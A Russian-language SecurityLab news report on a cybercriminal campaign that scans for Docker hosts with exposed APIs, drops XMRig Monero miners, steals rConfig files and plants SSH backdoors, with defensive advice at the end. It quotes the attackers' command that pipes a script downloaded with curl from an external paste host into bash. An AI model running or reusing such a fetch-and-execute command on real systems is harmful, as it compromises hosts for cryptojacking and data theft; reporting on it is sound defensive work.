Преступники майнят Monero на уязвимых Docker-системах

Преступники майнят Monero на уязвимых Docker-системах

Alexander Antipov

Злоумышленники взламывают Docker-системы с доступными в Сети API.

image

Некая киберпреступная группировка проводит массовое сканирование интернета на предмета Docker-систем с доступными в Сети API. Злоумышленники отправляют команды Docker-системам и размещают майнеры криптовалюты Monero. Вредоносная кампания началась 24 ноября и сразу же стала заметной из-за своего масштаба.

«Пользователи могут заметить, что подобные атаки на открытые Docker-системы не являются чем-то новым и происходят довольно часто. Отличительной чертой данной кампании был большой рост активности сканирования», — сообщил соучредитель компании Bad Packets Трой Марш (Troy Mursch).

По словам исследователей из Bad Packets, группа, осуществляющая данные атаки, в настоящее время сканирует более 59 тыс. IP-сетей (сетевых блоков) в поисках открытых Docker-систем. После обнаружения уязвимого хоста, злоумышленники используют API для запуска контейнера ОС Alpine Linux, где они запускают команду chroot/mnt/bin/sh -c’curl-sL4 http:// ix.io / 1XQa | bash. Она загружает и запускает скрипт Bash с сервера злоумышленников, который устанавливает классический майнер криптовалюты XMRRig. По словам Марша, за два дня с момента начала кампании преступники уже добыли 14,82 Monero (XMR) на общую сумму чуть более $740.

Эксперты также обнаружили, что преступники не только отключают защитные решения, но завершают все процессы, связанные с конкурирующими майнерами криптовалюты, такими как DDG. Как отмечается, вредоносный скрипт также содержит функцию сканирования зараженного хоста на наличие файлов rConfig. При обнаружении данные файлы шифруются и отправляются на C&C-сервер злоумышленников. Преступники также создают бэкдор на взломанных контейнерах и оставляют SSH-ключи для более легкого доступа и удаленного контроля зараженных хостов.

Эксперты рекомендуют пользователям Docker проверить, доступны ли в Сети их API, закрыть порты и удалить нераспознанные контейнеры.

Подписывайтесь на каналы «SecurityLab» в TelegramTelegram и Яндекс.ДзенЯндекс.Дзен, чтобы первыми узнавать о новостях и эксклюзивных материалах по информационной безопасности.

Источник: Securitylab